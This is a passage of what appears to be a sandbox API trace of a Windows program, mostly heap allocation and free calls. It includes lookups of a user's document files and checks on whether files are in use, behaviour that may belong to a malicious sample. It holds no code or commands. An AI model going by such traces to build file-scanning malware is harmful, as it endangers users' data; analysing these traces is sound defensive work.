0x1b218f0 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca430 [0079.036] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24d0 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.037] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2400 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0079.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0079.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2400 | out: hHeap=0x1780000) returned 1 [0079.037] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.037] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.037] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\eY_Dc1TDsg.pdf", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ecd1c80, ftCreationTime.dwHighDateTime=0x1d5e495, ftLastAccessTime.dwLowDateTime=0xb9a0f690, ftLastAccessTime.dwHighDateTime=0x1d5e453, ftLastWriteTime.dwLowDateTime=0xb9a0f690, ftLastWriteTime.dwHighDateTime=0x1d5e453, nFileSizeHigh=0x0, nFileSizeLow=0xba63, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="eY_Dc1TDsg.pdf", cAlternateFileName="EY_DC1~1.PDF")) returned 0x41ac700 [0079.038] FindClose (in: hFindFile=0x41ac700 | out: hFindFile=0x41ac700) returned 1 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf608 | out: hHeap=0x1780000) returned 1 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391930 [0079.038] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391930 | out: hHeap=0x1780000) returned 1 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0079.038] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8be8 [0079.039] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.039] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0079.039] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2440 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2470 [0079.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2400 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2410 [0079.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24a0 [0079.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0079.040] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0079.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0079.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0079.041] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.041] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0079.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0079.042] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.042] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.042] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.043] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0079.043] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0079.044] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0079.044] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0079.045] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.045] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0079.045] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.046] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0079.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0079.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.046] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0079.047] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0079.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.047] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0079.048] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0079.048] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, 